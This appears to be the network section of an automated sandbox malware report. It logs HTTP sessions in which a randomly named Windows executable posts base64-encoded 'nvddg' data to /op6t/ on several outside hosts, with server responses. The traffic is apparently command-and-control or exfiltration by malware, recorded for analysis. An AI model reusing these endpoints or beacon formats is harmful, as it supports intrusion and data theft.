                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.11.304980334.149.87.45807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:31:58.585235119 CEST1723OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.century21morenoycia.mx
                                                                        Origin: http://www.century21morenoycia.mx
                                                                        Referer: http://www.century21morenoycia.mx/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 34 56 52 58 66 59 52 4c 43 49 58 67 70 4b 62 76 4f 5a 32 34 37 2f 47 6d 6e 51 31 6c 2b 54 62 7a 50 61 71 5a 4a 6d 30 4f 6d 72 4e 53 55 56 78 79 6d 76 61 55 6d 4b 69 57 73 52 79 30 75 33 37 6d 68 36 39 2b 30 6b 54 55 50 79 68 67 76 6a 54 62 5a 52 77 38 74 74 4f 57 46 42 61 70 31 32 4e 38 64 4f 53 34 64 41 58 75 39 51 54 44 39 6d 68 45 48 4f 57 72 42 2b 5a 43 69 52 62 67 43 79 41 42 59 6c 4b 7a 68 62 41 69 39 7a 48 66 4c 74 57 77 52 72 45 69 48 52 49 39 36 71 4d 64 32 55 57 5a 39 63 55 75 4e 76 66 4b 54 4d 34 67 4c 33 31 54 36 64 37 51 55 6f 4e 43 69 48 77 4f 61 53 6c 47 54 58 54 47 34 30 44 48 6e 78 35 70 55 57 6a 79 62 35 79 70 67 58 64 4e 66 63 39 69 59 45 58 76 36 4b 71 72 66 4a 4f 6b 54 66 71 61 34 48 53 30 61 69 57 2b 4f 2f 58 65 73 51 54 52 39 6d 4f 41 78 31 2b 6e 4b 36 45 77 43 38 51 67 36 50 43 45 38 4c 53 79 7a 34 6f 79 54 35 52 6c 51 58 78 4e 66 46 55 48 34 64 61 6f 7a 65 61 53 68 48 34 31 55 79 6c 4b 77 54 66 57 48 43 31 53 32 6c 47 67 38 7a 42 49 55 70 4e 2f 6c 79 66 4e [TRUNCATED]
                                                                        Data Ascii: nvddg=4VRXfYRLCIXgpKbvOZ247/GmnQ1l+TbzPaqZJm0OmrNSUVxymvaUmKiWsRy0u37mh69+0kTUPyhgvjTbZRw8ttOWFBap12N8dOS4dAXu9QTD9mhEHOWrB+ZCiRbgCyABYlKzhbAi9zHfLtWwRrEiHRI96qMd2UWZ9cUuNvfKTM4gL31T6d7QUoNCiHwOaSlGTXTG40DHnx5pUWjyb5ypgXdNfc9iYEXv6KqrfJOkTfqa4HS0aiW+O/XesQTR9mOAx1+nK6EwC8Qg6PCE8LSyz4oyT5RlQXxNfFUH4daozeaShH41UylKwTfWHC1S2lGg8zBIUpN/lyfNVnfC5YNW4OWTimgj6mUmye+HdWUWo0yE4PxPhWTFVfYpPDfLzda3QadQsxQkVy3hD1TL7Twe9wVbzBOkgIJQNYKN2yEBA/n3Ektm47XZEZm2N2SJ4ncgO808N20CdqO1bkBLV2EtPv9P2LgX+wJ4dNtvV0+1PTpkpheGk2K2WK5wmVUlpArce3WsScSN2IfguRSQgDIgzUhKPjRFpEeMWInUa0mqAyKxLkuARZUbKqJK4waisLHOIEVkN6dWqKELk7CW/EvI05QgJwZHD25diOma8j7Ku2959cRtuhkVJIoAO3UQcRair4yNyyHos7l825ORcUuGUh+E/AUliu4pzHVQiysusjAFAX6YnTeeOtB4UvpjiokOCSGeV/YPiY80rTszlBg5A8fLsyp1XdeA3LtYApaeQZeEx0YWksSfY8iTI1beGgzhUeqhIi6O/XDI/jV/aWKOceTPVXT+32fvwjVtEWdLkrRApA920ipYNRxM1osSKuypQxPBDEWz0ePA2UPUFVPagQZ2Tcx9gLtBob1OCk5F9wcE0figQg285fZxo2PtrQn9+o4xXD/Duz4p4IJPcOETl9HF0I2rHrop3zmpT2qZI1m08r8C4fdt/wmRRagTPV7o4Zy27Q6a1Xz9WOgBpDs51hcqaM1GUs2dwPCP/90+sjpJQL [TRUNCATED]
                                                                        May 22, 2024 17:31:58.802642107 CEST1078INHTTP/1.1 403 Forbidden
                                                                        Content-Length: 548
                                                                        Content-Type: text/html
                                                                        Server: Pepyaka
                                                                        X-Wix-Request-Id: 1716391918.6989036252325017526
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Date: Wed, 22 May 2024 15:31:58 GMT
                                                                        X-Served-By: cache-bfi-krnt7300080-BFI
                                                                        X-Cache: MISS
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLquCTNcWTuCgj0HzMr4ZQgwm++C2XkuTvnlRFg2XiSDL
                                                                        Via: 1.1 google
                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.11.304980434.149.87.45807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:32:01.287664890 CEST495OUTGET /op6t/?nvddg=1X53ctdebY/A2eDtJqzL446hhD1I+nvyO5ulDREEvqgJJ1wskdyJ8sishyyYv1KZ95Yv7APwNDtcqTXRSGEguqmEKyboxWEzcfGHGWjx7gGV1XFCOYCNEPY=&x2=wN2xY HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.century21morenoycia.mx
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:32:01.605890989 CEST1188INHTTP/1.1 301 Moved Permanently
                                                                        Content-Length: 0
                                                                        Location: https://www.century21morenoycia.mx/op6t?nvddg=1X53ctdebY%2FA2eDtJqzL446hhD1I+nvyO5ulDREEvqgJJ1wskdyJ8sishyyYv1KZ95Yv7APwNDtcqTXRSGEguqmEKyboxWEzcfGHGWjx7gGV1XFCOYCNEPY%3D&x2=wN2xY
                                                                        Strict-Transport-Security: max-age=86400
                                                                        X-Wix-Request-Id: 1716391921.43217953563523127392
                                                                        Age: 0
                                                                        Cache-Control: no-cache
                                                                        Server: Pepyaka
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Date: Wed, 22 May 2024 15:32:01 GMT
                                                                        X-Served-By: cache-bfi-krnt7300107-BFI
                                                                        X-Cache: MISS
                                                                        Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_g
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqMQhUjPXFZZ6QMfhZ0ZUmYa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRaltysJ2DS6T5tlT4+YriOCFNA1mtqXjqeJ6NnIibDmWi+J3BVsW5vufvuxNlBNfOnpw==,2UNV7KOq4oGjA5+PKsX47Dble4mX84gMvMh/QnMYdHsfbJaKSXYQ/lskq2jK6SGP,WjYibKLCpAJr3VaKO1qH9qsELXQ+BXvQ7zCHAw7TWos=,9rSLScDc8xvwnXUS+E/OviP2uMDc1qPS6xWJcM6X4hk=,j1W3GTXLqH1rFP/nP6vn5n3Lq3ezQHSws1kprB2VJS4As3p4zJRwrswGGvG1EhAfNhK9YVRucqBPmZZHe8sdeQ==
                                                                        Via: 1.1 google
                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.11.304980534.174.122.2807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:32:25.365112066 CEST780OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.facesofhoustontx.com
                                                                        Origin: http://www.facesofhoustontx.com
                                                                        Referer: http://www.facesofhoustontx.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 4d 46 67 67 54 37 34 52 63 67 47 46 42 62 74 50 39 50 75 42 75 48 74 4c 4f 79 4d 63 32 77 43 57 69 4e 65 4e 57 71 4c 52 6f 59 7a 63 6e 61 73 52 58 70 45 6b 75 5a 69 6d 65 68 6e 53 2f 72 4c 37 38 47 6a 70 72 64 47 30 32 6e 44 55 6c 36 63 37 51 65 63 61 71 4a 71 51 6f 36 34 59 54 79 51 49 55 55 78 54 5a 41 47 42 70 6d 56 42 71 61 32 73 4d 50 36 59 6a 6a 37 76 6e 7a 75 57 71 69 46 49 61 70 31 4e 69 68 62 7a 76 59 74 63 34 77 2b 43 31 46 2b 34 6a 55 6b 37 55 44 55 64 77 51 50 44 39 61 35 61 4a 76 31 71 73 50 4b 74 47 65 66 34 61 6a 4a 47 39 63 32 31 71 55 45 66 79 2b 78 63 30 41 3d 3d
                                                                        Data Ascii: nvddg=MFggT74RcgGFBbtP9PuBuHtLOyMc2wCWiNeNWqLRoYzcnasRXpEkuZimehnS/rL78GjprdG02nDUl6c7QecaqJqQo64YTyQIUUxTZAGBpmVBqa2sMP6Yjj7vnzuWqiFIap1NihbzvYtc4w+C1F+4jUk7UDUdwQPD9a5aJv1qsPKtGef4ajJG9c21qUEfy+xc0A==


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.11.304980634.174.122.2807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:32:28.113116980 CEST800OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.facesofhoustontx.com
                                                                        Origin: http://www.facesofhoustontx.com
                                                                        Referer: http://www.facesofhoustontx.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 4d 46 67 67 54 37 34 52 63 67 47 46 42 36 64 50 79 4d 47 42 6f 6e 74 4d 41 53 4d 63 74 41 44 2b 69 4e 69 4e 57 72 4f 4f 70 75 6a 63 6d 37 63 52 46 63 6f 6b 74 5a 69 6d 4d 42 6e 4c 69 62 4c 47 38 47 76 62 72 63 36 30 32 6e 58 55 6c 37 73 37 54 70 77 46 72 5a 71 57 69 71 34 61 63 53 51 49 55 55 78 54 5a 41 69 6e 70 6d 64 42 74 71 47 73 4e 74 53 62 39 54 37 73 6b 7a 75 57 68 43 46 55 61 70 30 59 69 67 33 5a 76 64 78 63 34 77 75 43 31 55 2b 37 77 30 6b 39 4b 7a 56 72 31 69 36 54 31 65 5a 59 48 34 5a 47 6b 4f 54 56 4b 70 75 69 48 67 39 45 75 38 4b 59 32 56 70 33 77 38 77 48 70 45 41 6d 4d 70 6a 61 46 4e 48 4d 50 5a 54 59 4b 68 73 6d 35 4a 6f 3d
                                                                        Data Ascii: nvddg=MFggT74RcgGFB6dPyMGBontMASMctAD+iNiNWrOOpujcm7cRFcoktZimMBnLibLG8Gvbrc602nXUl7s7TpwFrZqWiq4acSQIUUxTZAinpmdBtqGsNtSb9T7skzuWhCFUap0Yig3Zvdxc4wuC1U+7w0k9KzVr1i6T1eZYH4ZGkOTVKpuiHg9Eu8KY2Vp3w8wHpEAmMpjaFNHMPZTYKhsm5Jo=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.11.304980734.174.122.2807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:32:30.856517076 CEST1717OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.facesofhoustontx.com
                                                                        Origin: http://www.facesofhoustontx.com
                                                                        Referer: http://www.facesofhoustontx.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 4d 46 67 67 54 37 34 52 63 67 47 46 42 36 64 50 79 4d 47 42 6f 6e 74 4d 41 53 4d 63 74 41 44 2b 69 4e 69 4e 57 72 4f 4f 70 75 72 63 6d 4e 49 52 58 4c 63 6b 73 5a 69 6d 50 42 6e 57 69 62 4c 58 38 46 66 66 72 63 32 6b 32 6b 76 55 6d 5a 6b 37 53 59 77 46 6b 5a 71 57 71 4b 34 5a 54 79 51 64 55 56 42 58 5a 41 79 6e 70 6d 64 42 74 73 71 73 45 66 36 62 2f 54 37 76 6e 7a 75 4b 71 69 46 6f 61 74 68 76 69 67 44 6a 73 70 39 63 34 52 65 43 7a 6d 57 37 7a 55 6b 2f 4c 7a 56 6a 31 69 6e 4a 31 61 34 70 48 34 46 73 6b 4d 7a 56 62 2b 50 56 63 42 39 46 35 65 4f 36 7a 30 38 41 33 50 6b 4c 68 44 5a 62 4d 4b 44 37 47 75 76 36 4b 2b 76 36 51 43 45 52 6b 74 66 2b 36 34 55 78 6f 34 58 6f 6d 31 6a 54 64 34 45 6d 61 69 54 61 4e 47 44 61 59 66 73 63 67 38 4c 30 51 7a 69 6f 58 38 52 37 54 67 51 6b 30 56 4a 6d 35 55 4e 50 55 62 71 72 75 79 75 4e 41 31 63 64 59 70 7a 66 4c 43 64 72 51 38 53 33 69 6a 46 30 56 31 71 6d 61 54 53 70 75 4b 6e 4c 44 48 45 55 48 41 34 47 31 71 56 44 67 5a 55 38 74 2f 39 38 4e 46 4d 72 [TRUNCATED]
                                                                        Data Ascii: nvddg=MFggT74RcgGFB6dPyMGBontMASMctAD+iNiNWrOOpurcmNIRXLcksZimPBnWibLX8Fffrc2k2kvUmZk7SYwFkZqWqK4ZTyQdUVBXZAynpmdBtsqsEf6b/T7vnzuKqiFoathvigDjsp9c4ReCzmW7zUk/LzVj1inJ1a4pH4FskMzVb+PVcB9F5eO6z08A3PkLhDZbMKD7Guv6K+v6QCERktf+64Uxo4Xom1jTd4EmaiTaNGDaYfscg8L0QzioX8R7TgQk0VJm5UNPUbqruyuNA1cdYpzfLCdrQ8S3ijF0V1qmaTSpuKnLDHEUHA4G1qVDgZU8t/98NFMrOqK7nA3yflSHNl6/vLIteJPPkc9im1aBJH80mtyzRICtxK7Dt/u1w8+2TtKvZ6+WPOw6HWmfVXEZZc9o1PI8WXr0NBMqANv5woCjlC/UUd0dUe3+D6hmHiVJct+5ryk4QW4kuwimSj2FPbphcSeuCw91SDEO9q/VIXexP9zB+PylFhsK4mfWAOEwpXEIbJ3A0yQvnOy8N/jMnN08ziILLaRliCVvJBPLLtOzwyMUpValMiUvtIeQMudhrr+hxCkF7gNK/TwfMYRcLz8aSKoWgJVfLTPdXpfp0LL1IbKhAUH93vIG4EKOGah1Ud2sYxfNonJAdm039GZUEZ4XLgIiyPXH2eealC6aXERvJgx1Oxatih89ovf148KxGZvkuIjUPZRtj031fCNzm6A0MftnymtZdc+gGVOlW8ElpyzLfFLIhYqaS8ugDFNOrEbI+mtLZOi/rTls0CcseDXamQfLHrDW1gqwWdLJcupkR1eRm6zbD2K6afphE6u8mw43RGeRtVr8QPmaXowq7mOp5Kysr3i9GPjaGDr5JqjU2rRvPxlX8eVF1XSmlUtEoLakjFCvm0CMmTR2ufaIOkMjlN3my1MbfQtTQj0aZtud4mDyPHXZ7a/EoW87X/yWK+IXuzxomxBDsRGuzJTqtTjF6gUNRj0hJsE7tso8eb [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.11.304980834.174.122.2807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:32:33.605540037 CEST493OUTGET /op6t/?x2=wN2xY&nvddg=BHIAQNMULh6XRL1bx9H5u1ZiIAZR91nuzdCSdKuFpLeK/J0eLacPvObCKir816qtvGKK6uKZvELi45NaX+Eep6GNrYofejB/V2VvbUmxnRNQoZSvM+S992o= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.facesofhoustontx.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.11.304980947.243.134.243807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:32:47.971615076 CEST753OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.cngdesk.com
                                                                        Origin: http://www.cngdesk.com
                                                                        Referer: http://www.cngdesk.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 4d 33 50 4f 70 31 4e 45 4b 59 68 47 33 78 55 37 66 4d 76 5a 6d 42 70 67 30 38 46 51 36 67 2b 4e 59 6d 68 62 2f 74 37 50 79 39 72 59 4a 2f 48 68 45 6a 79 70 2b 42 35 67 6f 67 7a 66 67 6b 5a 58 47 32 62 79 36 68 72 54 56 65 2f 55 62 69 48 53 6f 62 4f 6c 64 65 6e 66 69 6d 63 47 67 39 6f 34 67 6a 52 46 72 59 59 6a 4b 76 67 74 58 46 53 64 62 47 62 37 78 35 37 64 5a 75 44 6d 50 59 64 73 72 35 6e 4c 32 79 48 43 4f 58 52 74 32 44 67 6e 4e 4e 7a 64 57 64 36 6f 41 45 52 71 6c 35 4b 30 48 30 59 43 31 44 69 65 6a 79 74 6f 2b 71 31 6f 52 39 6c 37 6d 49 6f 43 32 71 66 34 2b 59 64 51 4d 77 3d 3d
                                                                        Data Ascii: nvddg=M3POp1NEKYhG3xU7fMvZmBpg08FQ6g+NYmhb/t7Py9rYJ/HhEjyp+B5gogzfgkZXG2by6hrTVe/UbiHSobOldenfimcGg9o4gjRFrYYjKvgtXFSdbGb7x57dZuDmPYdsr5nL2yHCOXRt2DgnNNzdWd6oAERql5K0H0YC1Diejyto+q1oR9l7mIoC2qf4+YdQMw==
                                                                        May 22, 2024 17:32:48.427275896 CEST354INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:32:48 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.11.304981047.243.134.243807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:32:50.831928015 CEST773OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.cngdesk.com
                                                                        Origin: http://www.cngdesk.com
                                                                        Referer: http://www.cngdesk.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 4d 33 50 4f 70 31 4e 45 4b 59 68 47 33 53 63 37 64 74 76 5a 68 68 70 6a 37 63 46 51 31 41 2b 4a 59 6d 64 62 2f 6f 43 55 78 50 50 59 4a 62 50 68 4b 43 79 70 2f 42 35 67 6a 41 79 56 6b 6b 5a 63 47 32 48 51 36 6a 2f 54 56 65 72 55 62 6e 44 53 6f 4d 61 6d 66 4f 6e 64 32 57 63 45 75 64 6f 34 67 6a 52 46 72 59 4e 4f 4b 75 49 74 58 31 4f 64 4a 6b 2f 38 37 5a 37 63 65 75 44 6d 4c 59 64 6f 72 35 6e 6c 32 7a 61 6c 4f 56 70 74 32 42 6f 6e 4f 5a 6e 65 59 64 36 71 45 45 51 70 6d 72 6a 4e 50 31 34 66 30 7a 79 34 73 41 70 44 32 64 45 79 4d 2b 52 35 31 6f 55 76 71 72 79 51 38 61 63 4c 52 38 53 44 57 79 37 67 68 50 2b 76 42 4c 33 6c 6c 6a 4a 32 42 76 6f 3d
